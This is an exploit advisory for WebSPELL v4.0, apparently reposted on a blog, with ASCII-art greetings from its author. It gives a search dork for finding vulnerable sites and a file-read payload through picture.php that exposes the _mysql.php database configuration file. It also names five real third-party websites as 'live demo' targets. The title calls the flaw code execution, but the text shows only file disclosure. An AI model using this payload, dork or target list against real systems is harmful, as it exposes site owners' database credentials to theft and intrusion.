[----]
/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-
\-/ --------------------------------------------/-----------------------------------------------|
\-/ [+] Exploit Title : WebSPELL v4.0 Code Execution Exploit |
\-/ [+] Date : 03/04/2012 |
\-/ [+] Author : xConsoLe` |
\-/ [+] Made in Algeria* |
\-/ [+] Category : WebApps |
\-/ [+] d0rk : ext:php intitle:webSPELL v4.0 |
\-/ [+] Home : N/A |
\-/ [+] Tested on : Windows Xp SP3 |
\-/ ------------------------------------------------------\-------------------------------------|
/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-
( ) /\ _ (
\ | ( \ ( \.( ) _____
\ \ \ ` ` ) \ ( ___ / _ \
(_` \+ . x ( .\ \/ \____-----------/ (o) \_
- .- \+ ; ( O \____
Dz 4 ) \_____________ ` \ /
(__ Ever <3 +- .( -'.- <. - _ VVVVVVV VV V\ \/
(_____ ._._: <_ - <- _ (-- _AAAAAAA__A_/ |
. /./.+- . .- / +-- - . \______________//_ \_______
(__ ' /x / x _/ ( \___' \ /
, x / ( ' . / . / | \ /
/ / _/ / + / \/
' (__/ / \
x onsoL ` W s H r .
. X X X X
. X X X X
. X . X X
. X . X X
. X . X X
. . . . .
xConsoLe` Was Here .
[+] Vulnerable Code :
[+] http://localhost/
[+] We can read the config file like this :
[+] http://localhost/picture.php?file=_mysql.php
[+] Right Clic > ShowSource
[+] ;D
[+] Live Demo :
- http://www.echoes-guild.com/picture.php?file=_mysql.php
- http://www.crazyfungamer.de/picture.php?file=_mysql.php
- http://www.dj-pedrofernandez.de/cgi//picture.php?file=_mysql.php
- http://r0fld2.uw.hu/picture.php?file=_mysql.php
- http://www.street.clanfusion.de/picture.php?file=_mysql.php
[+] BAC Exam > J - 58 // Nchallah Tout le monde L'aura !
[+] Peace & Love
[+] I'm xConsoLe` & I'm Proud To be Algerian .
[----]
Nenhum comentário:
Postar um comentário